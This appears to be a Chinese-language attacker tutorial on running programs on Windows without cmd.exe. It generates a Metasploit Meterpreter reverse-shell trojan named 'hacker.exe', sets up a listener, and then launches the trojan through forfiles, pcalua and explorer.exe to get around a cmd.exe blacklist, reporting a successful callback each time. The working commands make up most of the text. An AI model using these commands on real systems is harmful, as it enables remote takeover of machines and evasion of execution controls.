无cmd命令执行

序言:

有些时候不能使用cmd,如何命令执行呢?

Windows系统提供了多个二进制文件,可以使用它们执行任意命令。如果黑名单是cmd.exe,而没有设置白名单的配置,则是可以使用这些。

请看下面操作。

基础操作:

msf生成木马:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.22.120.80 lport=8888 -f exe -o hacker.exe

监听:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 172.22.120.80
LHOST => 172.22.120.80
msf6 exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf6 exploit(multi/handler) > run

1.Forfiles

说明:

win2003以上的系统,包括win7、windows server 2008均适用哦。forfiles 是一个命令实用程序,可以选择多个文件并在它们上运行命令,它通常用于批处理作业中,但可能会被滥用以执行任意命令或可执行文件。

语法:

默认搜索掩码为*,也使用参数 / p和/ m在Windows目录System32 和掩码calc.exe 上执行搜索,/ c参数之后的所有内容都是实际执行的命令。

例子:

forfiles /p c:\windows\system32 /m calc.exe /c E:\hacker.exe

成功上线,在运行中运行。

hack.exe是forfiles.exe的子进程。

2.Pcalua

说明:

进程兼容性助手是Windows实用程序,当它检测到存在兼容性问题的软件时就会运行。该实用程序位于“ C:\ Windows \ System32 ”中,并且可以使用“ -a”参数执行命令。

例子:

pcalua.exe -a E:\hacker.exe

成功上线,不使用cmd.exe,hacker.exe是一个父进程

3.Explorer

说明:

可以将explorer.exe 用作执行方法。执行的有效负载将在系统上创建一个进程,该进程将把explorer.exe作为父进程。

例子:

explorer.exe "E:\hacker.exe"

成功上线。